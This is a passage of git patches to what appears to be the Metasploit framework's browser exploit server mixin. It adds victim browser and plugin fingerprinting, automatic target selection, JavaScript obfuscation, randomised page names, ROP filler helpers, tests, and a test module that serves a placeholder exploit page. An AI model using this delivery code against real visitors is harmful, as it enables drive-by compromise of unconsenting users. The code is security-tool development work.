-        X_FORWARDED
-        FORWARDED
-        CLIENT_IP
-        FORWARDED_FOR_IP
-        HTTP_PROXY_CONNECTION
-      }.each do |name|
-        return true if request.headers[name]
-      end
-
-      false
+      proxy_header_set = PROXY_REQUEST_HEADER_SET & request.headers.keys
+      !proxy_header_set.empty?
     end
 
     #
@@ -309,7 +309,6 @@ module Msf
 
       js = ::Rex::Exploitation::JSObfu.new code
       js.obfuscate
-      js = code
 
       %Q|
       <script>

From 65c96a1f45d377894ed8da594679feb723fbfea5 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Wed, 6 Nov 2013 00:57:53 -0600
Subject: [PATCH 53/73] Allow the module to be target specific

---
 lib/msf/core/exploit/browser/server.rb        | 48 ++++++++++++++++++-
 .../exploits/test/browserexploitserver.rb     | 18 +++++--
 2 files changed, 59 insertions(+), 7 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index e33277fd04..f1b9c9fa8d 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -38,6 +38,9 @@ module Msf
     def initialize(info={})
       super
 
+      # The mixin keeps 'target' so module doesn't lose it.
+      @target = target
+
       # See get_profile's documentation to understand what @target_profiles stores
       @target_profiles = {}
 
@@ -87,6 +90,45 @@ module Msf
       "#{get_resource}/#{@exploit_receiver_page}"
     end
 
+    #
+    # Returns the current target
+    #
+    def get_target
+      @target
+    end
+
+    #
+    # Sets the target automatically based on what requirements are met.
+    # If there's a possible matching target, it will also merge the requirements.
+    # You can use the get_target() method to retrieve the most current target.
+    #
+    # @param profile [Hash] The profile to check
+    #
+    def try_set_target(profile)
+      match_counts = []
+
+      targets.each do |t|
+        if t['Requirements'].nil?
+          match_counts << 0
+        else
+          match_counts << t['Requirements'].select { |k,v|
+            if v.class == Regexp
+              profile[k] =~ v
+            else
+              profile[k] == v
+            end
+          }.length
+        end
+      end
+
+      if match_counts.max > 0
+        @target = targets[match_counts.index(match_counts.max)]
+        if get_target.opts['Requirements']
+          @requirements = @requirements.merge(get_target.opts['Requirements'])
+        end
+      end
+    end
+
     #
     # Returns an array of items that do not meet the requirements
     #
@@ -100,12 +142,13 @@ module Msf
       # If :activex is true, that means the clsid + method had a match,
       # if not, then false.
       if @requirements[:clsid] and @requirements[:method]
-        @requirements.delete(:clsid)
-        @requirements.delete(:method)
         @requirements[:activex] = 'true' # Script passes boolean as string
       end
 
       @requirements.each do |k, v|
+        # Special keys to ignore because the script registers this as [:activex] = true or false
+        next if k == :clsid or k == :method
+
         if v.class == Regexp
           bad_reqs << k if profile[k] !~ v
         else
@@ -372,6 +415,7 @@ module Msf
           send_not_found(cli)
         else
           update_profile(profile, :tried, true)
+          try_set_target(profile)
           bad_reqs = get_bad_requirements(profile)
           if bad_reqs.empty?
             method(:on_request_exploit).call(cli, request, profile)
diff --git a/test/modules/exploits/test/browserexploitserver.rb b/test/modules/exploits/test/browserexploitserver.rb
index f74a6efb35..480997e2fd 100644
--- a/test/modules/exploits/test/browserexploitserver.rb
+++ b/test/modules/exploits/test/browserexploitserver.rb
@@ -26,16 +26,23 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'URL', 'http://metasploit.com' ]
         ],
       'Platform'       => 'win',
-      'Requirements'   =>
+      'Requirements' =>
         {
           :source => /script|headers/i,
-          #:clsid  => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1
-          #:method => "LoadMovie"
-          #:os_name => /win/i
+          :clsid  => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
+          :method => "LoadMovie",
+          :os_name => /win/i
         },
       'Targets'        =>
         [
-          [ 'Automatic', {} ]
+          [ 'Automatic', {} ],
+          [ 'Windows XP with IE 8',
+            {
+              'Requirements' => { :os_flavor => 'XP', :ua_name => 'MSIE', :ua_ver => '8.0' },
+              'Rop'          => true,
+              'Offset'       => 0x100
+            }
+          ]
         ],
       'Payload'        =>
         {
@@ -48,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit_template(target_info)
+    #print_debug(get_target.inspect)
     %Q|
     <% msg = "This page is generated by an exploit" %>
     <%=msg%>

From 636adc81de809b050c056d5178b89293356cf936 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Wed, 6 Nov 2013 01:04:33 -0600
Subject: [PATCH 54/73] Add rop_junk and rop_nop

---
 lib/msf/core/exploit/ropdb.rb | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/lib/msf/core/exploit/ropdb.rb b/lib/msf/core/exploit/ropdb.rb
index a86ee438b8..20ad74ec88 100644
--- a/lib/msf/core/exploit/ropdb.rb
+++ b/lib/msf/core/exploit/ropdb.rb
@@ -31,5 +31,13 @@ module Exploit::RopDb
     return rop_payload
   end
 
+  def rop_junk
+    rand_text_alpha(4).unpack("V")[0].to_i
+  end
+
+  def rop_nop
+    make_nops(4).unpack("V")[0].to_i
+  end
+
 end
 end
\ No newline at end of file

From f2e4d5507c669a6deed39aaf7e28db98a9afbe3d Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Wed, 6 Nov 2013 01:45:40 -0600
Subject: [PATCH 55/73] More rspec

---
 lib/msf/core/exploit/browser/server.rb        |  3 +-
 .../msf/core/exploit/browser/server_spec.rb   | 57 ++++++++++++++-----
 2 files changed, 44 insertions(+), 16 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index f1b9c9fa8d..59492099e0 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -105,6 +105,7 @@ module Msf
     # @param profile [Hash] The profile to check
     #
     def try_set_target(profile)
+      print_debug(profile.inspect)
       match_counts = []
 
       targets.each do |t|
@@ -121,7 +122,7 @@ module Msf
         end
       end
 
-      if match_counts.max > 0
+      if match_counts.max.to_i > 0
         @target = targets[match_counts.index(match_counts.max)]
         if get_target.opts['Requirements']
           @requirements = @requirements.merge(get_target.opts['Requirements'])
diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index b58f9d0163..3416d8abfa 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -31,6 +31,22 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
   end
 
+  let(:expected_profile) do
+    {
+      :source=>"script",
+      :os_name=>"Microsoft Windows",
+      :os_flavor=>"XP",
+      :ua_name=>"MSIE",
+      :ua_ver=>"8.0",
+      :arch=>"x86",
+      :office=>"null",
+      :activex=>"true",
+      :proxy=>false,
+      :language=>"en-us",
+      :tried=>true
+    }
+  end
+
   before do
     Rex::ServiceManager.stub(:start => service_double)
   end
@@ -49,21 +65,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
 
   describe ".get_bad_requirements" do
     it "should not contain any bad requirements" do
-      fake_profile = {
-        "rMWwSAwBHLoESpHbEGbsv" => {
-          :source    => "script",
-          :os_name   => "Microsoft Windows",
-          :os_flavor => "XP",
-          :ua_name   => "MSIE",
-          :ua_ver    => "8.0",
-          :arch      => "x86",
-          :office    => "null",
-          :proxy     => false,
-          :language  => "en-us",
-          :tried     => true
-        }}
-
-        server.get_bad_requirements(fake_profile).should eq([])
+        server.get_bad_requirements(expected_profile).should eq([])
     end
 
     it "should have identify :os_name as a requirement not met" do
@@ -128,4 +130,29 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     end
   end
 
+  describe ".get_target" do
+    it "should return a target" do
+      #
+      # Using Object for Msf::Module::Target
+      #
+      expected_object = Object
+      server.instance_variable_set(:@target, expected_object)
+      server.get_target.should eq(expected_object)
+    end
+  end
+
+  describe ".try_set_target" do
+    it "should try to set a target based on requirements" do
+      #
+      # This testcase needs to be better somehow, but not sure how to actually create
+      # a Msf::Module::Target. All we're able to test here is making sure the method
+      # doesn't raise anything by exercising the code.
+      #
+      server.instance_variable_set(:@requirements, {:os_name => /win/i})
+      server.instance_variable_set(:@target, Object)
+      server.try_set_target(expected_profile)
+      server.get_target.should eq(Object)
+    end
+  end
+
 end
\ No newline at end of file

From c92116060eeb49a33b4fc904e8e7bb46cb19229a Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Wed, 6 Nov 2013 01:53:46 -0600
Subject: [PATCH 56/73] Forgot to rm this line

---
 lib/msf/core/exploit/browser/server.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 59492099e0..177bd64a09 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -105,7 +105,6 @@ module Msf
     # @param profile [Hash] The profile to check
     #
     def try_set_target(profile)
-      print_debug(profile.inspect)
       match_counts = []
 
       targets.each do |t|

From cf5d9c7f01282075d3b9b5c451dfd1362d7e121c Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Wed, 6 Nov 2013 11:41:36 -0600
Subject: [PATCH 57/73] Add case for IE10 + Win 7 SP1 detection

---
 data/js/detect/os.js | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/data/js/detect/os.js b/data/js/detect/os.js
index 1fdd2deb1f..dccf97d0a7 100644
--- a/data/js/detect/os.js
+++ b/data/js/detect/os.js
@@ -867,6 +867,12 @@ window.os_detect.getVersion = function(){
 				os_flavor = "7";
 				os_sp = "SP1";
 				break;
+			case "10016720":
+				// IE 10.0.9200.16721 / Windows 7 SP1
+				ua_version = "10.0";
+				os_flavor = "7";
+				os_sp = "SP1";
+				break;
 			case "1000":
 				// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
 				ua_version = "10.0";

From c338f7a8c0696b26e79e093aa8d6e9f0278d586f Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Wed, 6 Nov 2013 14:01:29 -0600
Subject: [PATCH 58/73] Change how requirements are defined, rspec, etc

---
 lib/msf/core/exploit/browser/server.rb        | 87 ++++++++++++-------
 .../msf/core/exploit/browser/server_spec.rb   | 17 ++++
 .../exploits/test/browserexploitserver.rb     | 37 ++++++--
 3 files changed, 105 insertions(+), 36 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 177bd64a09..4ed4247f1b 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -35,6 +35,21 @@ module Msf
          X_FORWARDED_FOR
       })
 
+    # Requirements a browser module can define
+    REQUIREMENT_KEY_SET = {
+      :source    => 'source',    # Either 'script' or 'headers'
+      :ua_name   => 'ua_name',   # Example: MSIE
+      :ua_ver    => 'ua_ver',    # Example: 8.0, 9.0
+      :os_name   => 'os_name',   # Example: Microsoft Windows
+      :os_flavor => 'os_flavor', # Example: XP, 7
+      :language  => 'language',  # Example: en-us
+      :arch      => 'arch',      # Example: x86
+      :proxy     => 'proxy',     # 'true' or 'false'
+      :office    => 'office',    # Example: "2007", "2010"
+      :clsid     => 'clsid',     # ActiveX clsid. Also requires the :method key
+      :method    => 'method'     # ActiveX method. Also requires the :clsid key
+    }
+
     def initialize(info={})
       super
 
@@ -45,21 +60,13 @@ module Msf
       @target_profiles = {}
 
       # Requirements are conditions that the browser must have in order to be exploited.
-      # Baisc requirements include:
-      # :source   The data source. Either 'script' or 'headers'
-      # :ua_name  The name of the browser
-      # :ua_ver   The version of the browser
-      # :os_name  The name of the operating system
-      # :language The language of the system
-      # :arch     The architecture
-      # :prxy     Indicates whether a proxy is used or not by the browser
-      @requirements = self.module_info['Requirements'] || {}
+      @requirements = self.module_info['BrowserRequirements'] || {}
 
       @info_receiver_page     = "info"
       @exploit_receiver_page  = "exploit"
       @noscript_receiver_page = "noscript"
 
-    register_options(
+      register_options(
       [
         OptBool.new('Retries', [false,  "Allow the browser to retry the module", true])
       ], Exploit::Remote::BrowserExploitServer)
@@ -97,6 +104,19 @@ module Msf
       @target
     end
 
+    #
+    # Returns a hash or requirements the mixin recognize
+    #
+    # @param reqs [Hash] A hash that contains data for the requirements
+    # @return [Hash] A hash of requirements
+    #
+    def extract_requirements(reqs)
+      # Collect all the recognizable keys
+      tmp = reqs.select {|k,v| REQUIREMENT_KEY_SET.has_key?(k.to_sym)}
+      # Make sure keys are always symbols
+      Hash[tmp.map{|(k,v)| [k.to_sym,v]}]
+    end
+
     #
     # Sets the target automatically based on what requirements are met.
     # If there's a possible matching target, it will also merge the requirements.
@@ -105,13 +125,15 @@ module Msf
     # @param profile [Hash] The profile to check
     #
     def try_set_target(profile)
-      match_counts = []
+      match_counts        = []
+      target_requirements = {}
 
       targets.each do |t|
-        if t['Requirements'].nil?
+        target_requirements = extract_requirements(t.opts)
+        if target_requirements.blank?
           match_counts << 0
         else
-          match_counts << t['Requirements'].select { |k,v|
+          match_counts << target_requirements.select { |k,v|
             if v.class == Regexp
               profile[k] =~ v
             else
@@ -123,8 +145,9 @@ module Msf
 
       if match_counts.max.to_i > 0
         @target = targets[match_counts.index(match_counts.max)]
-        if get_target.opts['Requirements']
-          @requirements = @requirements.merge(get_target.opts['Requirements'])
+        target_requirements = extract_requirements(@target.opts)
+        unless target_requirements.blank?
+          @requirements = @requirements.merge(target_requirements)
         end
       end
     end
@@ -150,9 +173,9 @@ module Msf
         next if k == :clsid or k == :method
 
         if v.class == Regexp
-          bad_reqs << k if profile[k] !~ v
+          bad_reqs << k if profile[k.to_sym] !~ v
         else
-          bad_reqs << k if profile[k] != v
+          bad_reqs << k if profile[k.to_sym] != v
         end
       end
 
@@ -168,14 +191,15 @@ module Msf
     #   ...... etc ......
     # }
     # A profile should at least have info about the following:
-    # :source  : The data source. Either from 'script', or 'headers'. The 'script' source
-    #             should be more accurate in some scenarios like browser compatibility mode
-    # :ua_name : The name of the browser
-    # :ua_ver  : The version of the browser
-    # :os_name : The name of the OS
-    # :language: The system's language
-    # :arch    : The system's arch
-    # :proxy   : Indicates whether proxy is used
+    # :source    : The data source. Either from 'script', or 'headers'. The 'script' source
+    #              should be more accurate in some scenarios like browser compatibility mode
+    # :ua_name   : The name of the browser
+    # :ua_ver    : The version of the browser
+    # :os_name   : The name of the OS
+    # :os_flavor : The flavor of the OS (example: XP)
+    # :language  : The system's language
+    # :arch      : The system's arch
+    # :proxy     : Indicates whether proxy is used
     #
     # For more info about what the actual value might be for each key, see HttpServer.
     #
@@ -326,15 +350,15 @@ module Msf
       window.onload = function() {
         var osInfo = window.os_detect.getVersion();
         var d = {
-          "os_name"   : osInfo.os_name,
-          "os_flavor" : osInfo.os_flavor,
-          "ua_name"   : osInfo.ua_name,
-          "ua_ver"    : osInfo.ua_version,
-          "arch"      : osInfo.arch
+          "<%=REQUIREMENT_KEY_SET[:os_name]%>"   : osInfo.os_name,
+          "<%=REQUIREMENT_KEY_SET[:os_flavor]%>" : osInfo.os_flavor,
+          "<%=REQUIREMENT_KEY_SET[:ua_name]%>"   : osInfo.ua_name,
+          "<%=REQUIREMENT_KEY_SET[:ua_ver]%>"    : osInfo.ua_version,
+          "<%=REQUIREMENT_KEY_SET[:arch]%>"      : osInfo.arch
         };
 
         <% if os == OperatingSystems::WINDOWS and client == HttpClients::IE %>
-          d['office'] = window.addons_detect.getMsOfficeVersion();
+          d['<%=REQUIREMENT_KEY_SET[:office]%>'] = window.addons_detect.getMsOfficeVersion();
           <%
             clsid  = @requirements[:clsid]
             method = @requirements[:method]
@@ -352,6 +376,7 @@ module Msf
 
       js = ::Rex::Exploitation::JSObfu.new code
       js.obfuscate
+      js = code
 
       %Q|
       <script>
diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index 3416d8abfa..08bcb77f6e 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -155,4 +155,21 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     end
   end
 
+  describe ".extract_requirements" do
+    it "should find all the recognizable keys" do
+      requirements = {:os_flavor=>"XP", :ua_name=>"MSIE", :ua_ver=>"8.0"}
+      matches = server.extract_requirements(requirements)
+      matches.should eq(requirements)
+    end
+
+    it "should make sure the keys are always symbols" do
+      requirements = {'os_flavor'=>"XP", 'ua_name'=>"MSIE"}
+      matches = server.extract_requirements(requirements)
+      puts matches.inspect
+      matches.each do |k,v|
+        k.class.should eq(Symbol)
+      end
+    end
+  end
+
 end
\ No newline at end of file
diff --git a/test/modules/exploits/test/browserexploitserver.rb b/test/modules/exploits/test/browserexploitserver.rb
index 480997e2fd..9a928d46e6 100644
--- a/test/modules/exploits/test/browserexploitserver.rb
+++ b/test/modules/exploits/test/browserexploitserver.rb
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'URL', 'http://metasploit.com' ]
         ],
       'Platform'       => 'win',
-      'Requirements' =>
+      'BrowserRequirements' =>
         {
           :source => /script|headers/i,
           :clsid  => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
@@ -36,14 +36,38 @@ class Metasploit3 < Msf::Exploit::Remote
       'Targets'        =>
         [
           [ 'Automatic', {} ],
-          [ 'Windows XP with IE 8',
+          [
+            'Windows XP with IE 8',
             {
-              'Requirements' => { :os_flavor => 'XP', :ua_name => 'MSIE', :ua_ver => '8.0' },
-              'Rop'          => true,
-              'Offset'       => 0x100
+              'os_flavor' => 'XP',
+              'ua_name'   => 'MSIE',
+              'ua_ver'    => '8.0',
+              'Rop'       => true,
+              'Offset'    => 0x100
+            }
+          ],
+          [
+            'Windows 7 with IE 9',
+            {
+              'os_flavor' => '7',
+              'ua_name'   => 'MSIE',
+              'ua_ver'    => '9.0',
+              'Rop'       => true,
+              'Offset'    => 0x100
+            }
+          ],
+          [
+            'Windows 7 with IE 10',
+            {
+              'os_flavor' => '7',
+              'ua_name'   => 'MSIE',
+              'ua_ver'    => '10.0',
+              'Rop'       => true,
+              'Offset'    => 0x100
             }
           ]
         ],
+
       'Payload'        =>
         {
           'BadChars'        => "\x00",  #Our spray doesn't like null bytes
@@ -70,6 +94,9 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def on_request_exploit(cli, request, target_info)
+    print_debug("Target selected: #{get_target.name}")
+    print_line(Rex::Text.to_hex_dump([rop_junk].pack("V*")))
+    print_line(Rex::Text.to_hex_dump([rop_nop].pack("V*")))
     p = get_payload(cli, target_info)
     vprint_line(Rex::Text.to_hex_dump(p))
     print_status("Sending exploit HTML...")

From 23996ec32c9c27bed60defdd1f20562050cee8b9 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Wed, 6 Nov 2013 22:47:02 -0600
Subject: [PATCH 59/73] Fix up some things

---
 lib/msf/core/exploit/browser/server.rb | 14 ++++++--------
 1 file changed, 6 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 4ed4247f1b..2ec09aafad 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -35,7 +35,7 @@ module Msf
          X_FORWARDED_FOR
       })
 
-    # Requirements a browser module can define
+    # Requirements a browser module can define in either BrowserRequirements or in targets
     REQUIREMENT_KEY_SET = {
       :source    => 'source',    # Either 'script' or 'headers'
       :ua_name   => 'ua_name',   # Example: MSIE
@@ -60,11 +60,11 @@ module Msf
       @target_profiles = {}
 
       # Requirements are conditions that the browser must have in order to be exploited.
-      @requirements = self.module_info['BrowserRequirements'] || {}
+      @requirements = extract_requirements(self.module_info['BrowserRequirements'] || {})
 
-      @info_receiver_page     = "info"
-      @exploit_receiver_page  = "exploit"
-      @noscript_receiver_page = "noscript"
+      @info_receiver_page     = rand_text_alpha(5)
+      @exploit_receiver_page  = rand_text_alpha(6)
+      @noscript_receiver_page = rand_text_alpha(7)
 
       register_options(
       [
@@ -105,13 +105,12 @@ module Msf
     end
 
     #
-    # Returns a hash or requirements the mixin recognize
+    # Returns a hash of recognizable requirements
     #
     # @param reqs [Hash] A hash that contains data for the requirements
     # @return [Hash] A hash of requirements
     #
     def extract_requirements(reqs)
-      # Collect all the recognizable keys
       tmp = reqs.select {|k,v| REQUIREMENT_KEY_SET.has_key?(k.to_sym)}
       # Make sure keys are always symbols
       Hash[tmp.map{|(k,v)| [k.to_sym,v]}]
@@ -376,7 +375,6 @@ module Msf
 
       js = ::Rex::Exploitation::JSObfu.new code
       js.obfuscate
-      js = code
 
       %Q|
       <script>

From 3e1771aa77c97b4532400bb9c79c10d85ad63c0e Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Nov 2013 00:12:29 -0600
Subject: [PATCH 60/73] Being able to pass binding when we need to

---
 lib/msf/core/exploit/browser/server.rb        | 11 ++++-
 .../exploits/test/browserexploitserver.rb     | 40 +++++++++++++++++--
 2 files changed, 45 insertions(+), 6 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 2ec09aafad..95b6f0d0d7 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -468,11 +468,18 @@ module Msf
     # Converts an ERB-based exploit template into HTML, and sends to client
     #
     # @param cli [Socket] Socket for the browser
-    # @param template [String] HTML
+    # @param template [String] The ERB template. If you want to pass the binding object,
+    #                          then this is handled as an Array, with the first element
+    #                          being the HTML, and the second element is the binding object.
     # @param headers [Hash] The custom HTTP headers to include in the response
     #
     def send_exploit_html(cli, template, headers={})
-      html = ERB.new(template).result
+      html = ''
+      if template.class == Array
+        html = ERB.new(template[0]).result(template[1])
+      else
+        html = ERB.new(template).result
+      end
       send_response(cli, html)
     end
 
diff --git a/test/modules/exploits/test/browserexploitserver.rb b/test/modules/exploits/test/browserexploitserver.rb
index 9a928d46e6..0f4ad1771a 100644
--- a/test/modules/exploits/test/browserexploitserver.rb
+++ b/test/modules/exploits/test/browserexploitserver.rb
@@ -78,11 +78,36 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget'  => 0))
   end
 
-  def exploit_template(target_info)
-    #print_debug(get_target.inspect)
+  #
+  # This example shows how to use ERB and being able to use the arguments and local vars
+  #
+  def exploit_template1(target_info, txt)
+    txt2 = "I can use local vars!"
+
+    template = %Q|
+    <% msg = "This page is generated by an exploit" %>
+    <%=msg%><br>
+    <%=txt%><br>
+    <%=txt2%><br>
+    <p></p>
+    Data gathered from source: #{target_info[:source]}<br>
+    OS name: #{target_info[:os_name]}<br>
+    Flavor: #{target_info[:os_flavor]}<br>
+    UA name: #{target_info[:ua_name]}<br>
+    UA version: #{target_info[:ua_ver]}<br>
+    Office version: #{target_info[:office]}
+    |
+
+    return template, binding()
+  end
+
+  #
+  # This example shows how to generate an ERB template without passing binding
+  #
+  def exploit_template2(target_info)
     %Q|
     <% msg = "This page is generated by an exploit" %>
-    <%=msg%>
+    <%=msg%><br>
     <p></p>
     Data gathered from source: #{target_info[:source]}<br>
     OS name: #{target_info[:os_name]}<br>
@@ -100,7 +125,14 @@ class Metasploit3 < Msf::Exploit::Remote
     p = get_payload(cli, target_info)
     vprint_line(Rex::Text.to_hex_dump(p))
     print_status("Sending exploit HTML...")
-    send_exploit_html(cli, exploit_template(target_info))
+
+    # Randomly pick a template to test
+    if [true, false].sample
+      txt = "I can pass more args"
+      send_exploit_html(cli, exploit_template1(target_info, txt))
+    else
+      send_exploit_html(cli, exploit_template2(target_info))
+    end
   end
 
   def exploit

From 991240a87eef2d66995d1b10031ffd3578622b7e Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 7 Nov 2013 00:54:52 -0600
Subject: [PATCH 61/73] Support java version detection

---
 data/js/detect/ie_addons.js                   |  6 +--
 lib/msf/core/exploit/browser/server.rb        |  9 +++--
 lib/msf/core/exploit/http/server.rb           |  4 ++
 lib/rex/exploitation/js/detect.rb             | 14 ++++++-
 .../msf/core/exploit/browser/server_spec.rb   |  1 -
 spec/lib/rex/exploitation/js/detect_spec.rb   | 13 ++++--
 .../exploits/test/browserexploitserver.rb     | 40 +++----------------
 7 files changed, 42 insertions(+), 45 deletions(-)

diff --git a/data/js/detect/ie_addons.js b/data/js/detect/ie_addons.js
index c875195943..d612bd7c78 100644
--- a/data/js/detect/ie_addons.js
+++ b/data/js/detect/ie_addons.js
@@ -1,10 +1,10 @@
-window.addons_detect = { };
+window.ie_addons_detect = { };
 
 /**
  * Returns true if this ActiveX is available, otherwise false.
  * Grabbed this directly from browser_autopwn.rb
  **/
-window.addons_detect.hasActiveX = function (axo_name, method) {
+window.ie_addons_detect.hasActiveX = function (axo_name, method) {
   var axobj = null;
   if (axo_name.substring(0,1) == String.fromCharCode(123)) {
     axobj = document.createElement("object");
@@ -41,7 +41,7 @@ window.addons_detect.hasActiveX = function (axo_name, method) {
 /**
  * Returns the version of Microsoft Office. If not found, returns null.
  **/
-window.addons_detect.getMsOfficeVersion = function () {
+window.ie_addons_detect.getMsOfficeVersion = function () {
   var version;
   var types = new Array();
   for (var i=1; i <= 5; i++) {
diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 95b6f0d0d7..299eda7d09 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -46,6 +46,7 @@ module Msf
       :arch      => 'arch',      # Example: x86
       :proxy     => 'proxy',     # 'true' or 'false'
       :office    => 'office',    # Example: "2007", "2010"
+      :java      => 'java',      # Example: 1.6, 1.6.0.0
       :clsid     => 'clsid',     # ActiveX clsid. Also requires the :method key
       :method    => 'method'     # ActiveX method. Also requires the :clsid key
     }
@@ -336,6 +337,7 @@ module Msf
       <%= js_base64 %>
       <%= js_os_detect %>
       <%= js_ajax_post %>
+      <%= js_misc_addons_detect %>
       <%= js_ie_addons_detect if os == OperatingSystems::WINDOWS and client == HttpClients::IE %>
 
       function objToQuery(obj) {
@@ -353,17 +355,18 @@ module Msf
           "<%=REQUIREMENT_KEY_SET[:os_flavor]%>" : osInfo.os_flavor,
           "<%=REQUIREMENT_KEY_SET[:ua_name]%>"   : osInfo.ua_name,
           "<%=REQUIREMENT_KEY_SET[:ua_ver]%>"    : osInfo.ua_version,
-          "<%=REQUIREMENT_KEY_SET[:arch]%>"      : osInfo.arch
+          "<%=REQUIREMENT_KEY_SET[:arch]%>"      : osInfo.arch,
+          "<%=REQUIREMENT_KEY_SET[:java]%>"      : window.misc_addons_detect.getJavaVersion()
         };
 
         <% if os == OperatingSystems::WINDOWS and client == HttpClients::IE %>
-          d['<%=REQUIREMENT_KEY_SET[:office]%>'] = window.addons_detect.getMsOfficeVersion();
+          d['<%=REQUIREMENT_KEY_SET[:office]%>'] = window.ie_addons_detect.getMsOfficeVersion();
           <%
             clsid  = @requirements[:clsid]
             method = @requirements[:method]
             if clsid and method
           %>
-          d['activex'] = window.addons_detect.hasActiveX('<%=clsid%>', '<%=method%>');
+          d['activex'] = window.ie_addons_detect.hasActiveX('<%=clsid%>', '<%=method%>');
           <% end %>
         <% end %>
 
diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
index 40d7f9593b..21e4b113df 100644
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -817,6 +817,10 @@ protected
     @cache_ie_addons_detect ||= ::Rex::Exploitation::Js::Detect.ie_addons
   end
 
+  def js_misc_addons_detect
+    @cache_misc_addons_detect ||= ::Rex::Exploitation::Js::Detect.misc_addons
+  end
+
   # Transmits a html response to the supplied client
   #
   # HTML evasions are implemented here.
diff --git a/lib/rex/exploitation/js/detect.rb b/lib/rex/exploitation/js/detect.rb
index feda40ef0a..c4d72d952b 100644
--- a/lib/rex/exploitation/js/detect.rb
+++ b/lib/rex/exploitation/js/detect.rb
@@ -39,7 +39,7 @@ class Detect
 
 
   #
-  # Provides javascript functions to determine addon information.
+  # Provides javascript functions to determine IE addon information.
   #
   # getMsOfficeVersion(): Returns the version for Microsoft Office
   #
@@ -50,6 +50,18 @@ class Detect
     Rex::Exploitation::JSObfu.new(js)
   end
 
+  #
+  # Provides javascript functions that work for all browsers to determine addon information
+  #
+  # getJavaVersion(): Returns the Java version
+  #
+  def self.misc_addons(custom_js = '')
+    js  = custom_js
+    js << ::File.read(::File.join(Msf::Config.data_directory, "js", "detect", "misc_addons.js"))
+
+    Rex::Exploitation::JSObfu.new(js)
+  end
+
 end
 end
 end
diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index 08bcb77f6e..889e27360d 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -165,7 +165,6 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     it "should make sure the keys are always symbols" do
       requirements = {'os_flavor'=>"XP", 'ua_name'=>"MSIE"}
       matches = server.extract_requirements(requirements)
-      puts matches.inspect
       matches.each do |k,v|
         k.class.should eq(Symbol)
       end
diff --git a/spec/lib/rex/exploitation/js/detect_spec.rb b/spec/lib/rex/exploitation/js/detect_spec.rb
index 93b698f108..f473f73fbd 100644
--- a/spec/lib/rex/exploitation/js/detect_spec.rb
